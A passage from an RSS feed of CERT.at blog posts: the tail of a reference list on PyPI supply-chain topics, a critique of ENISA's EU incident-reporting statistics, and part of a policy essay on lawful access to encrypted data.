&lt;p class=&quot;block&quot;&gt;[1]&amp;nbsp;&lt;a href=&quot;https://blog.pypi.org/posts/2024-08-16-safety-and-security-engineer-year-in-review/#project-lifecycle-status-quarantine&quot;&gt;https://blog.pypi.org/posts/2024-08-16-safety-and-security-engineer-year-in-review/#project-lifecycle-status-quarantine&amp;nbsp;&lt;/a&gt;&lt;br /&gt;[2]&amp;nbsp;&lt;a href=&quot;https://packaging.python.org/en/latest/specifications/project-status-markers/&quot;&gt;https://packaging.python.org/en/latest/specifications/project-status-markers/&amp;nbsp;&lt;/a&gt;&lt;br /&gt;[3]&amp;nbsp;&lt;a href=&quot;https://jfrog.com/blog/revival-hijack-pypi-hijack-technique-exploited-22k-packages-at-risk/&quot;&gt;https://jfrog.com/blog/revival-hijack-pypi-hijack-technique-exploited-22k-packages-at-risk/&amp;nbsp;&lt;br /&gt;&lt;/a&gt;[4] &lt;a href=&quot;https://blog.pypi.org/posts/2025-01-30-archival/&quot;&gt;https://blog.pypi.org/posts/2025-01-30-archival/&amp;nbsp;&lt;/a&gt;&lt;br /&gt;[5] &lt;a href=&quot;https://peps.python.org/pep-0792/&quot;&gt;https://peps.python.org/pep-0792/&amp;nbsp;&lt;/a&gt;&lt;br /&gt;[6] &lt;a href=&quot;https://packaging.python.org/en/latest/specifications/project-status-markers/&quot;&gt;https://packaging.python.org/en/latest/specifications/project-status-markers/&amp;nbsp;&lt;/a&gt;&lt;br /&gt;[7] &lt;a href=&quot;https://peps.python.org/pep-0592/&quot;&gt;https://peps.python.org/pep-0592/&amp;nbsp;&lt;/a&gt;&lt;br /&gt;[8] &lt;a href=&quot;https://pip-tools.readthedocs.io/en/stable/&quot;&gt;https://pip-tools.readthedocs.io/en/stable/&amp;nbsp;&lt;/a&gt;&lt;br /&gt;[9] &lt;a href=&quot;https://snyk.io/blog/why-npm-lockfiles-can-be-a-security-blindspot-for-injecting-malicious-modules/&quot;&gt;https://snyk.io/blog/why-npm-lockfiles-can-be-a-security-blindspot-for-injecting-malicious-modules/&amp;nbsp;&lt;/a&gt;&lt;br /&gt;[10] &lt;a href=&quot;https://peps.python.org/pep-0751/&quot;&gt;https://peps.python.org/pep-0751/&amp;nbsp;&lt;/a&gt;&lt;br /&gt;[11] &lt;a href=&quot;https://github.com/kam193/lock-the-ghost&quot;&gt;https://github.com/kam193/lock-the-ghost&amp;nbsp;&lt;/a&gt;&lt;br /&gt;[12] &lt;a href=&quot;https://www.reversinglabs.com/blog/fake-recruiter-campaign-crypto-devs&quot;&gt;https://www.reversinglabs.com/blog/fake-recruiter-campaign-crypto-devs&amp;nbsp;&lt;/a&gt;&lt;br /&gt;[13] &lt;a href=&quot;https://en.wikipedia.org/wiki/XZ_Utils_backdoor&quot;&gt;https://en.wikipedia.org/wiki/XZ_Utils_backdoor&amp;nbsp;&lt;/a&gt;&lt;br /&gt;[14] &lt;a href=&quot;https://github.com/kam193/package-campaigns/issues/5#issuecomment-3756880711&quot;&gt;https://github.com/kam193/package-campaigns/issues/5#issuecomment-3756880711&amp;nbsp;&lt;/a&gt;&lt;br /&gt;[15] &lt;a href=&quot;https://policies.python.org/pypi.org/Terms-of-Service/#3-ownership-of-content-right-to-post-and-license-grants&quot;&gt;https://policies.python.org/pypi.org/Terms-of-Service/#3-ownership-of-content-right-to-post-and-license-grants&amp;nbsp;&lt;/a&gt;&lt;br /&gt;[16] &lt;a href=&quot;https://policies.python.org/pypi.org/Terms-of-Service/#2-upon-cancellation&quot;&gt;https://policies.python.org/pypi.org/Terms-of-Service/#2-upon-cancellation&amp;nbsp;&lt;/a&gt;&lt;br /&gt;[17] &lt;a href=&quot;https://en.wikipedia.org/wiki/Npm_left-pad_incident&quot;&gt;https://en.wikipedia.org/wiki/Npm_left-pad_incident&amp;nbsp;&lt;/a&gt;&lt;br /&gt;[18] &lt;a href=&quot;https://github.com/untitaker/python-atomicwrites/issues/61&quot;&gt;https://github.com/untitaker/python-atomicwrites/issues/61&amp;nbsp;&lt;/a&gt;&lt;br /&gt;[19]&amp;nbsp;&lt;a href=&quot;https://discuss.python.org/t/stop-allowing-deleting-things-from-pypi/17227&quot;&gt;https://discuss.python.org/t/stop-allowing-deleting-things-from-pypi/17227&amp;nbsp;&lt;/a&gt;&lt;/p&gt;</description><pubDate>Tue, 10 Mar 2026 16:31:20 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2026/3/lock-the-ghost</guid><dc:creator>CERT.at</dc:creator><dc:date>2026-03-10T16:31:20Z</dc:date></item><item><title>Incident Reporting: EU-Wide Statistics</title><link>https://www.cert.at/en/blog/2026/2/incident-reporting-eu-wide-statistics</link><description>&lt;p&gt;At the last CSIRTs Network meeting we got treated to a powerpoint versions of the statistics that ENISA publishes under &lt;a href=&quot;https://ciras.enisa.europa.eu/&quot;&gt;https://ciras.enisa.europa.eu/&lt;/a&gt;&lt;/p&gt;&#13;
&lt;p&gt;The mathematician inside me was not impressed, and as I&amp;rsquo;m prone to do, I did not withhold my opinion. This blog post explains why I&amp;rsquo;m so unhappy with ENISA&amp;rsquo;s analysis.&lt;/p&gt;&#13;
&lt;h2&gt;Timeline&lt;/h2&gt;&#13;
&lt;p&gt;First, let&amp;rsquo;s look at the overall timeline:&lt;/p&gt;&#13;
&lt;p&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20260222/2026-2-0_17-42_IncidentsBySectorPerYear.png&quot; alt=&quot;&quot; width=&quot;814&quot; height=&quot;600&quot; /&gt;&lt;/p&gt;&#13;
&lt;p&gt;What&amp;rsquo;s wrong here?&lt;/p&gt;&#13;
&lt;h3&gt;Axis linearity&lt;/h3&gt;&#13;
&lt;p&gt;Most of the vertical bars cover the timespan of a year, whereas the last 4 cover only quarters. This messes up the intuitive understanding of the diagram in two ways:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;The x-axis is not covering time in a linear way&lt;/li&gt;&#13;
&lt;li&gt;You can&amp;rsquo;t compare the heights of the last 4 bars to the ones from before &amp;ndash; you&amp;rsquo;re best off ignoring them as the full year 2025 is also in the graph.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p&gt;As I&amp;rsquo;m creating similar graphs for the Austrian data, I can sympathise with the quest of doing both long-term statistics as well as conveying detailed data from the recent months. My solution is the following:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;Do a purely yearly graph for the long-term view of the overall numbers. If the last year is partial, that&amp;rsquo;s ok. People understand that. I sometimes think it might be worthwhile to scale up the last year and draw it shaded, just to indicate where the full year will land if the reporting rate stays the same.&lt;/li&gt;&#13;
&lt;li&gt;And have a second graph covering the numbers per month, reaching back 6 to 18 months. That would also work with quarters.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h3&gt;&amp;ldquo;Other&amp;rdquo;&lt;/h3&gt;&#13;
&lt;p&gt;The first 8 years cover only incidents in the sector &amp;ldquo;other&amp;rdquo;. If I&amp;rsquo;m not mistaken, these are all reports that were collected via the telecommunication regulation. Only with 2020, NIS1 kicked in and we see the first reports from the NIS sectors.&lt;/p&gt;&#13;
&lt;p&gt;So, if CIRAS is aggregating NIS reporting with other regimes like DORA and Telecoms, then please label the data as such. It looks a bit like we&amp;rsquo;re mix and matching data received due to different regulations.&lt;/p&gt;&#13;
&lt;h3&gt;Impact of Regulations&lt;/h3&gt;&#13;
&lt;p&gt;One important piece of information for us here in Austria is the effect of NIS2 on the number of reports we can expect when the NIS2 transpositions goes live later in 2026. These diagrams do not give us any indication what to expect. The reason is that the NIS2 transpositions in the EU Member states did go live at the same moment: that process is still ongoing. Thus, the expected jumps in reports have happened (or will happen) at different moments in time, thus their effects are smeared over more than two years in this diagram, completely obscuring their effect.&lt;/p&gt;&#13;
&lt;p&gt;Recommendation: create a diagram where the X-axis is not the calendar year, but months after NIS2 went live in each MS. I&amp;rsquo;d also use thin lines to show each MS&amp;rsquo;s data (not labelled, I we can&amp;rsquo;t disclose individual numbers) and a thick line (or bars) for the overall data.&lt;/p&gt;&#13;
&lt;p&gt;Do the same for NIS1.&lt;/p&gt;&#13;
&lt;h2&gt;Root Causes&lt;/h2&gt;&#13;
&lt;p&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20260222/2026-2-0_18-34_RootCausePerYear.png&quot; alt=&quot;&quot; width=&quot;814&quot; height=&quot;400&quot; /&gt;&lt;/p&gt;&#13;
&lt;p&gt;This development is wild. For a long time, &amp;ldquo;System Failures&amp;rdquo; completely dominated &amp;ldquo;Malicious Actions&amp;rdquo;, That&amp;rsquo;s also what I see in the NIS1 data from Austria, and what I heard from a few colleagues I asked during the meeting. &lt;strong&gt;But in 2025, &quot;Malicious Actions&quot; suddenly overtook &quot;Malfunctions&quot;.&lt;/strong&gt; So, what&amp;rsquo;s going on?&lt;/p&gt;&#13;
&lt;p&gt;This is where the graphs provided by ENISA simply give no answer, and where the presentation from ENISA did also not provide any insight.&lt;/p&gt;&#13;
&lt;p&gt;Imagine you're doing statistics in the health sector, aggregating data from hospitals. For years on end, the root cause for emergency treatments were accidents by a huge margin, but last year that changed to 50% intentional violence. If you presented data showing that change in&amp;nbsp;a press conference&amp;nbsp;without further explanation, you would be crucified. And rightfully so. This is such a significant change in the trend, that it must trigger a second look. Is this change only happening in one city, oder the whole country? How much is this shift in data a result of changes in reporting processes? Is this harmless, e.g. we're now including data that we previously did not include in the reporting, or was there really a huge increase in violence in our country?&lt;/p&gt;&#13;
&lt;p&gt;What I see in our NIS1 data is that the voluntary reporting shows a much higher rate of malicious activity than mandatory reporting. So it would be interesting to see the cross-tabs of &amp;ldquo;Incident&amp;rdquo; / &amp;rdquo;Significant Incident&amp;rdquo; with the root case.&lt;/p&gt;&#13;
&lt;p&gt;Is this switch in root causes also related to the implementation of NIS2? Probably yes, but with the published data, we don&amp;rsquo;t know. Is there a geographic or sectoral tilt? Also not covered.&lt;/p&gt;&#13;
&lt;h2&gt;Uniformity of Reporting&lt;/h2&gt;&#13;
&lt;p&gt;This brings me to a question which the data published by ENISA completely side-steps: &lt;strong&gt;Are there systematic differences in how the different member states report incidents?&lt;/strong&gt;&lt;/p&gt;&#13;
&lt;p&gt;I&amp;rsquo;ve heard from a mid-sized MS that their reporting numbers are pretty low &amp;nbsp;- even less than what Austria is reporting. If a small MS just set very low thresholds or managed to convince their entities to voluntarily report small issues, then they might completely drown out the numbers of some larger states.&lt;/p&gt;&#13;
&lt;p&gt;We might have a systematic statistical problem at our hands.&lt;/p&gt;&#13;
&lt;p&gt;If the way MS implementing reporting is really diverging a lot, then just adding the absolute numbers together is a rather pointless exercise. The results will be misleading.&lt;/p&gt;&#13;
&lt;p&gt;What is really needed here is some statistical analysis that looks at what patterns are universal across the EU and where do we have outliers. Optimally, you would plot the result on a map, but if we cannot publish country-level breakdowns, then we at least can give statistics on how certain parameters are distributed across the 27 MS. For example:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;Reports (by type) per time scaled by population size&lt;/li&gt;&#13;
&lt;li&gt;Ratio between &amp;ldquo;Incidents&amp;rdquo; and &amp;ldquo;Significant Incidents&amp;rdquo;&lt;/li&gt;&#13;
&lt;li&gt;Distribution between sectors&lt;/li&gt;&#13;
&lt;li&gt;Distribution of root causes (divided out by Incident type)&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p&gt;If the NIS implementation were uniform, there should only be minor, explainable differences (more Banks in LU, more digital service providers in NL, etc.).&amp;nbsp; Anything major, which cannot be explained by delays in NIS2 transposition, should trigger a manual investigation.&lt;/p&gt;&#13;
&lt;p&gt;We don&amp;rsquo;t necessarily need a uniform implementation of incident reporting. But we need to be aware if that&amp;rsquo;s not the case and what that means for policy decisions based on the numbers from CIRAS.&lt;/p&gt;&#13;
&lt;p&gt;As they stand right now, I don&amp;rsquo;t think they are fit for decision making.&lt;/p&gt;</description><pubDate>Sun, 22 Feb 2026 19:54:39 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2026/2/incident-reporting-eu-wide-statistics</guid><dc:creator>CERT.at</dc:creator><dc:date>2026-02-22T19:54:39Z</dc:date></item><item><title>Lawful access to encrypted data: General Considerations</title><link>https://www.cert.at/en/blog/2026/2/lawful-access-to-encrypted-data-general-considerations</link><description>&lt;p&gt;Last week, I wrote a blog post on&lt;a href=&quot;https://www.cert.at/en/blog/2026/2/lawful-access-to-encrypted-data-why-is-this-so-hard-to-do&quot;&gt; why the problem of lawful access to encrypted data is so tricky&lt;/a&gt;, this week I want to continue with a discussion on the general considerations you should keep in mind when thinking about this topic.&lt;/p&gt;&#13;
&lt;p&gt;Important note: I think LE is well aware of these considerations and agrees with most of my conclusions.&lt;/p&gt;&#13;
&lt;h2&gt;Regulatory Overreach&lt;/h2&gt;&#13;
&lt;p&gt;As long as citizens are free to program themselves, or download software from the Internet, and run that applciation on their own devices, then there will be ways to evade any mechanism that the state can think of to give LE access to encrypted data.&lt;/p&gt;&#13;
&lt;p&gt;I see no appetite to restrict generic computing or start a government licensing scheme for communication software on any side of the discussion.&lt;/p&gt;&#13;
&lt;p&gt;Similarly, there is no push to tightly regulate the properties of communication services. Even in Australia, where there is a clear legal mandate to force the operators into compliance, the &lt;a href=&quot;https://www.homeaffairs.gov.au/about-us/our-portfolios/national-security/lawful-access-telecommunications/assistance-and-access-industry-assistance-framework&quot;&gt; law states &lt;/a&gt; that &amp;ldquo;Importantly, a TCN is expressly prohibited from requiring the building of a capability to decrypt information or remove electronic protection.&amp;rdquo;&lt;/p&gt;&#13;
&lt;h2&gt;No perfect solution&lt;/h2&gt;&#13;
&lt;p&gt;As a corollary to the first point, there cannot be a solution that will work in 100% of the cases when LE wants (and gets a proper warrant) to access encrypted data.&lt;/p&gt;&#13;
&lt;p&gt;There will always be skilled criminals, state actors, technology &amp;amp; privacy enthusiasts, niche platforms or emerging technology that will not be covered by the access solution.&lt;/p&gt;&#13;
&lt;p&gt;Open Source is also incredibly hard to tackle here.&lt;/p&gt;&#13;
&lt;p&gt;We just need to accept that.&lt;/p&gt;&#13;
&lt;h2&gt;No Weakening of Encryption Algorithms&lt;/h2&gt;&#13;
&lt;p&gt;Previously, the United States government tried to regulate or influence the strength of the encryption algorithms that are widely deployed. That ranged from the design of &lt;a href=&quot;https://en.wikipedia.org/wiki/Data_Encryption_Standard&quot;&gt;DES&lt;/a&gt; , to &amp;ldquo;&lt;a href=&quot;https://en.wikipedia.org/wiki/Export_of_cryptography_from_the_United_States&quot;&gt;export version of cryptography&lt;/a&gt;&amp;rdquo; to actively trying to backdoor algorithms (A &lt;a href=&quot;https://en.wikipedia.org/wiki/NOBUS&quot;&gt;NOBUS&lt;/a&gt; in &lt;a href=&quot;https://en.wikipedia.org/wiki/Dual_EC_DRBG&quot;&gt;Dual_EC_DRBG&lt;/a&gt; ).&lt;/p&gt;&#13;
&lt;p&gt;There is a wide consensus that this is the wrong approach for lawful access due to the following reasons:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;A NOBUS makes the whole ecosystem brittle, because if the secret backdoor leaks, then everything becomes instantly insecure.&lt;/li&gt;&#13;
&lt;li&gt;Weak crypto is really hard to get right as&#13;
&lt;ul&gt;&#13;
&lt;li&gt;With all the private investments in GPUs for AI there is now a lot of cracking power available to rent in the cloud&lt;/li&gt;&#13;
&lt;li&gt;With the advances in computing power, the right strength is a moving target, and choices need to be right for years to come&lt;/li&gt;&#13;
&lt;li&gt;Quantum computers add further unpredictability&lt;/li&gt;&#13;
&lt;li&gt;Historically, the &amp;ldquo;export version&amp;rdquo; of cryptography led to &lt;a href=&quot;https://drownattack.com/#faq-factors&quot;&gt;ugly problems&lt;/a&gt;&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h2&gt;#define GOODGUYS&lt;/h2&gt;&#13;
&lt;p&gt;Who should be able to use the technology behind the lawful access technology?&lt;/p&gt;&#13;
&lt;p&gt;At first glance, this is simple, but if you think a bit more about this, it becomes really tricky.&lt;/p&gt;&#13;
&lt;h3&gt;So, who are we talking about?&lt;/h3&gt;&#13;
&lt;p&gt;Will this be a tool that the normal police force will be able access? If yes, then perhaps we&amp;rsquo;re giving them too much power &amp;ndash; we don&amp;rsquo;t want to fight petty crime with such a powerful tool.&lt;/p&gt;&#13;
&lt;p&gt;Or is this something that will be reserved for the special units which are tasked with fighting terrorism or organized crime? Think FBI, BfV, DSN and equivalents.&lt;/p&gt;&#13;
&lt;p&gt;But then you have the defensive military services: they are tasked to do counterespionage and similar security functions. They, too, will want to be able to use those surveillance tools to perform their supremely important mission.&lt;/p&gt;&#13;
&lt;p&gt;Next in line will be the intelligence agencies. If they hear that LE can have such spiffy toys to break open encrypted communication, then they will also knock on the door of the politicians. And why should they be denied? They also have a mission and why shouldn&amp;rsquo;t they also get all the tools that could make their job so much easier?&lt;/p&gt;&#13;
&lt;p&gt;And God forbid, we find ourselves in a hot war &amp;ndash; or just a short &amp;ldquo;special military operation&amp;rdquo;, then clearly all those departments for offensive cyber war inside our militaries will also want to use these interfaces.&lt;/p&gt;&#13;
&lt;h3&gt;Whose good guys?&lt;/h3&gt;&#13;
&lt;p&gt;The other dimension is geography: I might trust my own police, but surely not the police from some authoritarian regime.&lt;/p&gt;&#13;
&lt;p&gt;And the other players from the list above? Are we really ok with military intelligence services from other EU countries being able to remotely listen to encrypted communication in your country? The threshold for them in terms of legal safeguards / requirements is completely different than what applies to our national police.&lt;/p&gt;&#13;
&lt;p&gt;Going back in history, e.g. WW2 shows another complication: Alliances can shift. Former partners became adversaries overnight. Governments can be toppled and anything you might have trusted the old one with, might be used by the new one against you. The same can also apply to commercial entities from other countries.&lt;/p&gt;&#13;
&lt;h3&gt;How do we restrict the solution to the intended organizations?&lt;/h3&gt;&#13;
&lt;p&gt;Is it enough to just have legal and/or contractual restrictions in place to keep the wrong organizations from accessing the LE access mechanisms?&lt;/p&gt;&#13;
&lt;p&gt;I fear that this is not enough. Legal boundaries are susceptible to be swept aside by emergencies, political changes or simple corruption.&lt;/p&gt;&#13;
&lt;p&gt;We need technical means to restrict the reach of the LE access methods. For example, a method that needs physical access to a device to start a wiretap is much less likely to be abused from abroad.&lt;/p&gt;&#13;
&lt;h3&gt;Jurisdiction is really, really tricky&lt;/h3&gt;&#13;
&lt;p&gt;As I already wrote in the previous article, jurisdiction is a hard problem. Consider these examples:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;A judge from Country A issues a warrant that the communication of X should be wiretapped. LEA in A installs spyware on X&amp;rsquo;s phone. X travels to a different country. Can the surveillance continue, or does it have to stop?&lt;/li&gt;&#13;
&lt;li&gt;A Citizen of country A uses an OTT service hosted in country B: Can LEA in country A force the operator in another country to help with the wiretap?&lt;/li&gt;&#13;
&lt;li&gt;A group of enthusiasts in Country A publish open-source software which enables encrypted communication: Can a law in country B regulate backdoors to be put in to enable wiretapping there?&lt;/li&gt;&#13;
&lt;li&gt;A company in Country A, where the legal mandate doesn&amp;rsquo;t apply is selling products locally. A travelling citizen of Country B, where the law applies, buys a device and brings it home. Is this now illegal contraband?&lt;/li&gt;&#13;
&lt;li&gt;A device stolen in Country A is brought into Country B where LE is bribed to break it open.&lt;/li&gt;&#13;
&lt;li&gt;When installing a full-disk encryption solution in Country A, the key is escrowed to some entity in Country A. The device is then brought to Country B. Will the disk have to be re-encrypted and escrowed to the equivalent entity in Country B?&lt;/li&gt;&#13;
&lt;li&gt;How will devices even know where they are? How can the system be subverted by messing with the location detection algorithms? (VPNs, spoofed GPS, etc.)&lt;/li&gt;&#13;
&lt;li&gt;Who holds the master configuration data for all of this? This includes mapping coordinates to jurisdictions and then from jurisdiction to the keys / contact points of the proper entities. Any abuse of this position completely breaks open the whole scheme.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p&gt;We need to come up with list of all these permutations and define in advance where the access scheme MUST work, SHOULD work and MUST NOT work.&lt;/p&gt;&#13;
&lt;h2&gt;Implementation is hard&lt;/h2&gt;&#13;
&lt;p&gt;Pluck suitable key-sharding algorithms, key-escrow or zero-knowledge proofs from the academic literature and you can quite easily can come up with something that looks perfectly workable on a PowerPoint slide. Getting it to work in a lab might also be doable.&lt;/p&gt;&#13;
&lt;p&gt;The math of the algorithms might manageable, but getting an implemented system that is truly secure is next level difficult. Way too often the security of an encryption scheme failed not because of the algorithm, but because mistakes were made in the implementation. Typical ones are the selection of bad parameters, side-channels in timings, and insufficient entropy in the creation of nonces and initialization vectors.&lt;/p&gt;&#13;
&lt;p&gt;And then there is scaling the solution to billions of devices in the real world. &amp;nbsp;&lt;/p&gt;&#13;
&lt;p&gt;How will it be deployed in global production pipelines and supply chains?&lt;/p&gt;&#13;
&lt;p&gt;How will it handle events like key-rollovers, security incidents or algorithm changes?&lt;/p&gt;&#13;
&lt;p&gt;What happens when institutions or borders change?&lt;/p&gt;&#13;
&lt;h2&gt;Expanding our Attack Surface while Maintaining Security&lt;/h2&gt;&#13;
&lt;p&gt;We&amp;rsquo;re creating &amp;ldquo;intended breaking points&amp;rdquo; in device &amp;amp; communication security to enable LE to access unencrypted data. This is expanding the attack surface of our IT systems.&lt;/p&gt;&#13;
&lt;p&gt;If &amp;ndash; and this is a big if &amp;ndash; vendors are asked to mediate LE access to devices and data (see the recent &lt;a href=&quot;https://www.forbes.com/sites/thomasbrewster/2026/01/22/microsoft-gave-fbi-keys-to-unlock-bitlocker-encrypted-data/&quot;&gt; press reports on Microsoft disclosing BitLocker recovery-keys to LE&lt;/a&gt;), then they become even more critical.&lt;/p&gt;&#13;
&lt;p&gt;To use an analogy: We are hoping that we&amp;rsquo;re buying good bullet-proof vests from our vendors. Now we&amp;rsquo;re asking them to modify their vests such that they will cease to block bullets fired by a police officer whenever the proper judicial warrant is waved into the direction of the vest.&lt;/p&gt;&#13;
&lt;p&gt;(Sometimes this reminds me of trying to secure weapons by adding fingerprint readers &amp;ndash; an idea which hasn&amp;rsquo;t really taken off, either.)&lt;/p&gt;&#13;
&lt;p&gt;Once those LE access paths are in place, our attack surface also includes:&lt;/p&gt;&#13;
&lt;h3&gt;The IT security of the vendors themselves.&lt;/h3&gt;&#13;
&lt;p&gt;If they hold the special key that can give LE access to a suspect&amp;rsquo;s phone, then they also hold the key that can enable malicious actors to access the phones of politicians, CEOs, journalists and everyone else.&lt;/p&gt;&#13;
&lt;p&gt;Of course, we are already in many aspects dependent on the internal security of our vendors &amp;ndash; as the increased focus on supply chain security in various policy documents shows.&lt;/p&gt;&#13;
&lt;p&gt;Still, this is a massive expansion. It paints an even bigger bullseye on their back. Getting into the systems that broker that access is huge jackpot for any threat actor.&lt;/p&gt;&#13;
&lt;h3&gt;Regulatory Environment of Vendors&lt;/h3&gt;&#13;
&lt;p&gt;Do you remember the scary stories regarding our dependency on vendors from foreign countries? How Kaspersky was ruled out of various contracts because the Russian state might force them to do something against the interests of their customers? The EU built the whole &lt;a href=&quot;https://digital-strategy.ec.europa.eu/en/library/eu-toolbox-5g-security&quot;&gt;5G Toolbox&lt;/a&gt;&amp;nbsp;on the premise that &amp;ldquo;high-risk vendors&amp;rdquo; from 3&lt;sup&gt;rd&lt;/sup&gt; countries supplying and operating networking equipment is a strategic vulnerability we cannot afford.&lt;/p&gt;&#13;
&lt;p&gt;What about Apple, Google, Microsoft, Samsung and others? How much can they be forced by the government in their home countries to do something that does not align with our interests? That question might have been hypothetical in past, but those calculations surely have changed over the last 13 months.&lt;/p&gt;&#13;
&lt;p&gt;In plain text: can foreign vendors be forced by their own national security apparatus to hand them the keys that the EU might legislate into existence?&lt;/p&gt;&#13;
&lt;h3&gt;Law Enforcement Agencies themselves&lt;/h3&gt;&#13;
&lt;p&gt;And then there is law enforcement themselves. They hold (directly or indirectly) the keys to access any organisation&amp;rsquo;s network if this scheme ever goes live.&lt;/p&gt;&#13;
&lt;p&gt;Thus, the integrity of LEA is now part of everybody&amp;rsquo;s attack surface. Yes, that&amp;rsquo;s not really new, and in the physical world this always becomes relevant when a country slides from democracy into authoritarianism (just ask Minnesota). The tricky thing about the cyber side is that you can&amp;rsquo;t start filming police officers misbehaving with your mobile phone. It would happen undetected.&lt;/p&gt;&#13;
&lt;p&gt;So, how much do we trust the security and integrity (IT, processes, people) of LEAs?&lt;/p&gt;&#13;
&lt;h2&gt;Liability&lt;/h2&gt;&#13;
&lt;p&gt;Trust is good, liability is better.&lt;/p&gt;&#13;
&lt;p&gt;This is something I hear a lot from CISOs and the NIS2 directive also went into the same direction: we need the people who decide to take certain risks to also assume the liability if something goes haywire.&lt;/p&gt;&#13;
&lt;p&gt;Are the entities involved in the whole scheme (regulatory authorities, key escrow providers, certification authorities, vendors implementing the solution) in any way willing to say: &amp;ldquo;Yes, this is a good idea. And if it leads to damages caused by a security failure on my side, I will compensate the injured party.&amp;rdquo;?&lt;/p&gt;&#13;
&lt;p&gt;If nobody is willing to do that, then perhaps we as a society didn&amp;rsquo;t complete a full risk assessment.&lt;/p&gt;&#13;
&lt;h2&gt;Corollary: no master key&lt;/h2&gt;&#13;
&lt;p&gt;In order to keep the risk and thus the potential liability somewhere on the manageable side, we cannot have a system where a single breach anywhere can completely destroy the security properties of millions of devices.&lt;/p&gt;&#13;
&lt;h2&gt;Freedom to Innovate&lt;/h2&gt;&#13;
&lt;p&gt;The EU Commission recently published its &lt;a href=&quot;https://digital-strategy.ec.europa.eu/en/library/digital-omnibus-regulation-proposal&quot;&gt; Digital Omnibus Regulation Proposal &lt;/a&gt; to reduce the regulatory burden on EU-based technology companies. Whatever solution the expert group might come up with, it should not introduce a new regulatory hurdle for innovation made in the EU. If we don&amp;rsquo;t manage the thread this needle, we could drive companies out of the EU. See &lt;a href=&quot;https://www.heise.de/en/news/Surveillance-Proton-relocates-parts-of-its-infrastructure-from-Switzerland-10538664.html&quot;&gt; Proton&amp;rsquo;s move away from Switzerland &lt;/a&gt; for an example.&lt;/p&gt;&#13;
&lt;p&gt;We might need something like the size-caps in NIS2 or the &amp;ldquo;&lt;a href=&quot;https://digital-strategy.ec.europa.eu/en/policies/dsa-vlops&quot;&gt;Very large online platforms&lt;/a&gt;&amp;rdquo; from the DSA &amp;nbsp;to avoid targeting private operators and start-ups. A regulation that is appropriate for WhatsApp might not be sensible to the Nextcloud Talk instance of SME.&lt;/p&gt;&#13;
&lt;h2&gt;International Impact of regulations&lt;/h2&gt;&#13;
&lt;p&gt;If a democratic, well-run country can force global operators of OTT software to give them access to plaintext (in legally defined situations), how can they refuse to do the same for a country with a less stellar reputation, to say nothing of borderline authoritarian countries?&lt;/p&gt;&#13;
&lt;p&gt;I remember that a few years back the US government suffered from a split personality regarding the Tor network: The State Department was funding Tor to help dissidents in non-free countries to be able to securely communicate and reach the open Internet, while at the same time the FBI was railing against Tor, threatening to outlaw it, because criminals in the US were using it to hide criminal marketplaces.&lt;/p&gt;&#13;
&lt;p&gt;If we break open e.g., Signal for our LE, how can we expect it to save the lives of civil rights campaigners in difficult countries? This circles back to &amp;ldquo;Who are the good guys?&amp;rdquo;.&lt;/p&gt;&#13;
&lt;h2&gt;Effect on User Behaviour&lt;/h2&gt;&#13;
&lt;p&gt;The solution might change the behaviour of law-abiding citizens in a negative way. For example, if it utilizes targeted software updates to devices under surveillance, then we must expect that some less bright people will chose to just &amp;ldquo;disable updates to be secure&amp;rdquo;.&lt;/p&gt;&#13;
&lt;p&gt;Or, if the official version of a chat app includes the LE access &amp;ldquo;feature&amp;rdquo;, then people will start to side-load a version of the app which claims to be free of such &amp;ldquo;features&amp;rdquo;. This will be a bonanza for scams and will lead to an overall decline in cyber hygiene.&lt;/p&gt;&#13;
&lt;p&gt;Yes, this might not be rational, but if the Covid pandemic showed us anything, then this: A sizable part of our population is vulnerable to conspiracy theories that will drive their behaviour in an unsafe direction.&lt;/p&gt;&#13;
&lt;p&gt;Thus: whatever the solution is, the effect on the broader population is something we need to think about.&lt;/p&gt;&#13;
&lt;h2&gt;Will we eat our own dog food?&lt;/h2&gt;&#13;
&lt;p&gt;According to the &lt;a href=&quot;https://digital-strategy.ec.europa.eu/en/library/cyber-blueprint-council-recommendation&quot;&gt;EU Blueprint&lt;/a&gt; (&amp;ldquo;XII: Secure communication&amp;ldquo;), we&amp;rsquo;re supposed to develop a secure communication infrastructure. Will we include LE access in the design?&lt;/p&gt;&#13;
&lt;p&gt;According to &lt;a href=&quot;https://www.heise.de/en/news/Signal-Messenger-Von-der-Leyen-has-preset-auto-delete-for-messages-10628236.html&quot;&gt; press reports &lt;/a&gt; , Macron and von der Leyen used Signal to communicate. Would we be ok if LE could technically (getting a warrant might be hard in this case) start to wiretap that communication?&lt;/p&gt;&#13;
&lt;p&gt;Interesting from a legal point are protected communications: Journalists talking to sources, lawyers writing to their clients, doctors, priests.&lt;/p&gt;&#13;
&lt;h2&gt;Prevention of Abuse / Tracking the Usage&lt;/h2&gt;&#13;
&lt;p&gt;A fully functional system to access encrypted communication can be a huge advantage for LE investigations. It has the potential to become the go-to tool whenever LE hits a rough spot in a case. It can be like a cheat-code in a computer game, or the ring of power from the Tolkien books: Powerful, but dangerous. Reading the &lt;a href=&quot;https://www.europarl.europa.eu/doceo/document/A-9-2023-0189_EN.html&quot;&gt; final report from the EU Parliament on the abuse of surveillance tools &lt;/a&gt; is a sobering exercise.&lt;/p&gt;&#13;
&lt;p&gt;We thus need built-in speed-brakes and accountability tools. There needs to be an audit trail that cannot be manipulated.&lt;/p&gt;&#13;
